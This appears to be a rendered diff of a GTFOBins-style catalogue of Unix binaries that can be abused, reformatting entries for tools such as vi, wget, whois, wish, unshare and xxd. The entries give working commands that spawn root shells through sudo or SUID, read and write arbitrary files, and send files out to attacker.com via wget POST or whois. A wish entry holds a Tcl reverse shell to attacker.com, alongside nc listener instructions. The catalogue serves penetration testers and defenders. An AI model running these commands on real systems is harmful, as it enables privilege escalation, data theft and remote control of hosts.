sudo unexpand -t99999999 "$LFILE"
|
||||
---
|
||||
|
@ -1,17 +1,18 @@
|
||||
---
|
||||
description: |
|
||||
The read file content is corrupted by squashing multiple adjacent lines.
|
||||
description: 'The read file content is corrupted by squashing multiple adjacent lines.
|
||||
|
||||
'
|
||||
functions:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo uniq "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./uniq "$LFILE"
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
uniq "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
uniq "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./uniq "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo uniq "$LFILE"
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: unshare /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo unshare /bin/sh
|
||||
- code: unshare /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./unshare -r /bin/sh
|
||||
- code: "./unshare -r /bin/sh"
|
||||
sudo-enabled:
|
||||
- code: sudo unshare /bin/sh
|
||||
---
|
||||
|
@ -1,20 +1,21 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: vi -c ':!/bin/sh'
|
||||
- code: |
|
||||
vi
|
||||
:set shell=/bin/sh
|
||||
:shell
|
||||
sudo-enabled:
|
||||
- code: sudo vi -c ':!/bin/sh'
|
||||
suid-enabled:
|
||||
- code: ./vi -c ':!/bin/sh -p'
|
||||
file-read:
|
||||
- code: |
|
||||
vi file_to_read
|
||||
- code: vi -c ':!/bin/sh'
|
||||
- code: |
|
||||
vi
|
||||
:set shell=/bin/sh
|
||||
:shell
|
||||
file-write:
|
||||
- code: |
|
||||
vi file_to_write
|
||||
w
|
||||
- code: |
|
||||
vi file_to_write
|
||||
w
|
||||
file-read:
|
||||
- code: 'vi file_to_read
|
||||
|
||||
'
|
||||
suid-enabled:
|
||||
- code: "./vi -c ':!/bin/sh -p'"
|
||||
sudo-enabled:
|
||||
- code: sudo vi -c ':!/bin/sh'
|
||||
---
|
||||
|
@ -1,12 +1,12 @@
|
||||
---
|
||||
functions:
|
||||
execute-non-interactive:
|
||||
- code: watch /usr/bin/id
|
||||
sudo-enabled:
|
||||
- code: sudo watch /usr/bin/id
|
||||
- code: watch /usr/bin/id
|
||||
suid-enabled:
|
||||
- description: This keeps the SUID privileges only if the `-x` option is present.
|
||||
code: ./watch -x /usr/bin/id
|
||||
- description: This keeps the SUID privileges only if the `-x` option is present.
|
||||
code: "./watch -x /usr/bin/id"
|
||||
sudo-enabled:
|
||||
- code: sudo watch /usr/bin/id
|
||||
suid-limited:
|
||||
- code: ./watch /usr/bin/id
|
||||
- code: "./watch /usr/bin/id"
|
||||
---
|
||||
|
@ -1,15 +1,16 @@
|
||||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export URL=http://attacker.com/
|
||||
export LFILE=file_to_send
|
||||
wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
|
||||
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request.
|
||||
Run an HTTP service on the attacker box to collect the file.
|
||||
code: |
|
||||
export URL=http://attacker.com/
|
||||
export LFILE=file_to_send
|
||||
wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=file_to_save
|
||||
wget $URL -O $LFILE
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://attacker.com/file_to_get
|
||||
export LFILE=file_to_save
|
||||
wget $URL -O $LFILE
|
||||
---
|
||||
|
@ -1,31 +1,37 @@
|
||||
---
|
||||
description: |
|
||||
`whois` hangs waiting for the remote peer to close the socket.
|
||||
description: "`whois` hangs waiting for the remote peer to close the socket.\n"
|
||||
functions:
|
||||
upload:
|
||||
- description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_to_send
|
||||
whois -h $RHOST -p $RPORT "`cat $LFILE`"
|
||||
- description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_to_send
|
||||
whois -h $RHOST -p $RPORT "`base64 $LFILE`"
|
||||
- description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"`
|
||||
on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'`
|
||||
and its length is limited by the maximum size of arguments.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_to_send
|
||||
whois -h $RHOST -p $RPORT "`cat $LFILE`"
|
||||
- description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d'
|
||||
| base64 -d > "file_to_save"` on the attacker box to collect the file. The file
|
||||
length is limited by the maximum size of arguments.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_to_send
|
||||
whois -h $RHOST -p $RPORT "`base64 $LFILE`"
|
||||
download:
|
||||
- description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. The file has instances of `$'\x0d'` stripped.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_to_save
|
||||
whois -h $RHOST -p $RPORT > "$LFILE"
|
||||
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_to_save
|
||||
whois -h $RHOST -p $RPORT | base64 -d > "$LFILE"
|
||||
- description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345
|
||||
< "file_to_send"` on the attacker box to send the file. The file has instances
|
||||
of `$'\x0d'` stripped.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_to_save
|
||||
whois -h $RHOST -p $RPORT > "$LFILE"
|
||||
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send"
|
||||
| nc -l -p 12345` on the attacker box to send the file.
|
||||
code: |
|
||||
RHOST=attacker.com
|
||||
RPORT=12345
|
||||
LFILE=file_to_save
|
||||
whois -h $RHOST -p $RPORT | base64 -d > "$LFILE"
|
||||
---
|
||||
|
@ -1,17 +1,17 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: |
|
||||
wish
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo wish
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
- code: |
|
||||
wish
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
reverse-shell-non-interactive:
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish
|
||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||
code: |
|
||||
export RHOST=attacker.com
|
||||
export RPORT=12345
|
||||
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo wish
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
---
|
||||
|
@ -1,14 +1,16 @@
|
||||
---
|
||||
functions:
|
||||
execute-non-interactive:
|
||||
- code: xargs -a /dev/null /usr/bin/id
|
||||
sudo-enabled:
|
||||
- code: sudo xargs -a /dev/null /usr/bin/id
|
||||
suid-enabled:
|
||||
- code: ./xargs -a /dev/null /usr/bin/id
|
||||
- code: xargs -a /dev/null /usr/bin/id
|
||||
file-read:
|
||||
- description: This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only.
|
||||
code: |
|
||||
LFILE=file_to_read
|
||||
xargs -a "$LFILE" -0
|
||||
- description: This works as long as the file does not contain the NUL character,
|
||||
also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed.
|
||||
GNU version only.
|
||||
code: |
|
||||
LFILE=file_to_read
|
||||
xargs -a "$LFILE" -0
|
||||
suid-enabled:
|
||||
- code: "./xargs -a /dev/null /usr/bin/id"
|
||||
sudo-enabled:
|
||||
- code: sudo xargs -a /dev/null /usr/bin/id
|
||||
---
|
||||
|
@ -1,19 +1,19 @@
|
||||
---
|
||||
functions:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo xxd "$LFILE" | xxd -r
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./xxd "$LFILE" | xxd -r
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
xxd "$LFILE" | xxd -r
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo data | xxd | xxd -r - "$LFILE"
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo data | xxd | xxd -r - "$LFILE"
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
xxd "$LFILE" | xxd -r
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./xxd "$LFILE" | xxd -r
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo xxd "$LFILE" | xxd -r
|
||||
---
|
||||
|
@ -1,9 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
execute-interactive:
|
||||
- code: zsh
|
||||
sudo-enabled:
|
||||
- code: sudo zsh
|
||||
- code: zsh
|
||||
suid-enabled:
|
||||
- code: ./zsh
|
||||
- code: "./zsh"
|
||||
sudo-enabled:
|
||||
- code: sudo zsh
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user